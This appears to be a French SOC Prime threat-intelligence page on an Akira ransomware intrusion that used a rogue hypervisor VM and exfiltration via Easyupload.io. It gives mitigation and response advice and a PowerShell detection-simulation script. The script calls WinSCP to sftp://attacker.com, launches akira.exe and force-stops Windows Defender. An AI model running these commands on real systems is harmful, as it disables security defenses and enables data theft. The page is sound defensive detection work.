SOC Prime Bias: Élevé

19 Jun 2026 07:31 UTC

Akira, LimeWire, et le goût amer de l’exfiltration de données

Author Photo
SOC Prime Team linkedin icon Suivre
Akira, LimeWire, et le goût amer de l’exfiltration de données
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Un affilié du ransomware Akira a obtenu un accès non autorisé à un hyperviseur et a créé une nouvelle machine virtuelle pour utiliser comme environnement de préparation furtif. L’attaquant s’est appuyé sur cette VM isolée pour éviter la surveillance de sécurité, préparer les données avec WinRAR et exfiltrer les archives via la plateforme de partage de fichiers Easyupload.io. Le cas démontre comment les acteurs de la menace continuent à abuser des services de téléchargement légitimes pour le vol de données.

Enquête

L’enquête a combiné la télémétrie EDR, les journaux d’événements Windows, et l’historique de navigation Microsoft Edge pour reconstruire l’intrusion. Les analystes ont également récupéré une image VHDX de la machine virtuelle malveillante, qui a révélé que l’attaquant avait désactivé Microsoft Defender et mis en place l’opération de ransomware Akira. L’examen forensic de la VM a exposé les outils, sites web et flux de travail exacts utilisés durant les phases de préparation et d’exfiltration.

Atténuation

Les organisations doivent surveiller l’apparition de nouveaux points d’accès ou de machines virtuelles non autorisés dans leur environnement. Une visibilité forte sur l’accès à distance aux systèmes critiques tels que les hyperviseurs et les contrôleurs de domaine est essentielle. Il est également important de restreindre ou de surveiller de près l’accès aux services de partage de fichiers et de téléchargement rapide connus qui peuvent être utilisés pour l’exfiltration.

Réponse

Si un accès non autorisé à un hyperviseur est identifié, isolez immédiatement l’hyperviseur concerné et toute nouvelle machine virtuelle créée. Effectuez une analyse forensic des images de disque de la VM pour déterminer l’étendue de la préparation des données et de l’exfiltration. Examinez les journaux d’accès pour retracer le point d’entrée initial et confirmez qu’aucun accès persistant par l’attaquant ne subsiste.

Flux d’attaque

Exécution de simulation

Prérequis : La vérification préalable du télémétrie et du baseline doit avoir réussi.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT directement refléter les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un diagnostic erroné.

  • Récit de l’attaque et commandes : L’adversaire a obtenu l’accès initial et cherche à augmenter l’impact. Ils commencent par énumérer les fichiers sensibles en vérifiant les fichiers texte connus comme AdUsers.txt. Pour préparer l’exfiltration, ils utilisent WinRAR.exe pour compresser les données. Ils préparent ensuite leur outil d’exfiltration, WinSCP.exe, et finalement exécutent la charge utile du ransomware akira.exe . Pour empêcher l’EDR/antivirus de tuer le processus, ils tentent d’arrêter le service Windefend . Cette séquence spécifique d’arguments en ligne de commande et de changements d’état de service est conçue pour déclencher la logique de détection spécifique à Akira.

  • Script de test de régression :

    # Script de simulation pour la validation de détection du ransomware Akira
    # NOTE : Ce script nécessite des privilèges d'administrateur pour arrêter le service Defender.
    
    Write-Host "[+] Démarrage de la simulation du ransomware Akira..." -ForegroundColor Cyan
    
    # 1. Simuler la découverte/l'énumération (T1119)
    Write-Host "[+] Étape 1 : Simulation de l'énumération de fichiers via Notepad..."
    Start-Process notepad.exe -ArgumentList "AdUsers.txt"
    Start-Sleep -Seconds 2
    
    # 2. Simuler l'archivage des données (T1560.003)
    # Note : Nous supposons que WinRAR est présent ou que nous simulons l'activité en ligne de commande
    Write-Host "[+] Étape 2 : Simulation de l'archivage des données avec WinRAR..."
    Start-Process "WinRAR.exe" -ArgumentList "a -r sensitive_data.rar AdUsers.txt AdComp.txt"
    Start-Sleep -Seconds 2
    
    # 3. Simuler la préparation de l'outil d'exfiltration (T1105)
    Write-Host "[+] Étape 3 : Simulation de l'exécution de l'outil d'exfiltration..."
    Start-Process "WinSCP.exe" -ArgumentList "/command open sftp://attacker.com"
    Start-Sleep -Seconds 2
    
    # 4. Simuler l'exécution du ransomware (T1204.002)
    Write-Host "[+] Étape 4 : Simulation de l'exécution de la charge utile Akira..."
    Start-Process "akira.exe"
    Start-Sleep -Seconds 2
    
    # 5. Simuler la désactivation de Defender (T1564.006)
    # Cela déclenche l'EventID 7036 dans le journal système
    Write-Host "[+] Étape 5 : Tentative d'arrêt de Microsoft Defender..."
    Stop-Service -Name "Windefend" -Force
    
    Write-Host "[+] Simulation terminée. Vérifiez les alertes dans SIEM." -ForegroundColor Green
  • Commandes de nettoyage :

    # Script de nettoyage
    Write-Host "[+] Nettoyage des artefacts de simulation..." -ForegroundColor Cyan
    
    # Redémarrer le service Defender
    Start-Service -Name "Windefend"
    
    # Supprimer les fichiers simulés
    Remove-Item -Path "AdUsers.txt", "AdComp.txt", "sensitive_data.rar" -ErrorAction SilentlyContinue
    
    Write-Host "[+] Nettoyage terminé." -ForegroundColor Green